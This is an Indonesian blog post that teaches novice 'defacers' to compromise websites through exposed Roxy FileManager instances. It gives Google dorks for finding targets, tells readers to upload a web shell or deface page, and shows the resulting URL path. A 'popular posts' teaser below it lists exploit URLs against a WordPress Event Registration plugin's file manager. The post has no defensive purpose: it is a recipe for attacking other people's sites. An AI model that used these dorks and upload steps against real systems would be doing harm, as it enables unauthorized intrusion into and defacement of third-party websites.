Skip to main content

Deface Metode Roxy FileManager

Deface metode Roxy FileManager - sebenernya teknik ini sudah cukup lama, dan mungkin untuk para defacer lama juga tau dan bisa melakukan nya. Tapi disini saya sengaja membuat artikel Supaya Para defacer Awam Juga dapat belajar Untuk Teknik Yang satu ini. Dari pada berlama-lama langsung saja simak tutorial nya dibawah ini.
Pertama
Dorking di google menggunakan dork dibawah ini.
inurl:/ckeditor/fileman/index.html
intitle:"Roxy file manager" inurl:/fileman/index.html
inurl:/ckeditor/fileman/
Pilih saja salah satu dork diatas, kemudian dorking di google.
Baca Juga: DEFACE METODE PRO TAXI
Kedua
Pilih salah satu websitenya, kemudian buka website.
Tampilannya kira-kira seperti ini.
Upload shell maupun script deface kalian.
Catatan: Tidak Semua Web Bisa Di Upload Shell, Tergantung Dari Keberuntungan Kalian:v
Ketiga 
Gambar dibawah contoh jika kalian sukses meng-upload shell maupun Script Deface Kalian.
Untuk Path file nya Kalian Cukup Tambahin "/Uploads/def.html" dibelakang target.com/ckeditor/fileman/
Contoh lengkap:
target.com/ckeditor/fileman/Uploads/def.html

Boumm....
Berhasil!!..
Itu dia tadi tutorial deface metode Roxy FileManager, semoga artikel ini bisa bermanfaat buat kalian semua.
Baca Juga: SCRIPT LOGIN SHELL[PHP] FORBIDDEN PAGE LOGIN

Comments

Popular posts from this blog

Deface Metode Responsive Filemanager

Deface Metode Responsive Filemanager Sesuai dengan judulnya kali ini Mimin Bakal Share Tutorialnya kali ini.

Deface metode WP Event Registration File Upload

Kali ini Mimin Bakal Memberikan tutorial Deface Lagi. Oke dari pada berlama-lama, langsung saja ke tutorialnya. Dork: inurl: /wp-content/plugins/event-registration/jscripts/tiny_mce *Kembangin Dork Bila Perlu Exploit: Exploit 1 => /wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true Exploit 2 => /wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/upload.php?path=/home/[DIRECTORY-NAME-HERE]/public_html/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files Exploit 3 => /wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&url=/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/Select%20file&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true La...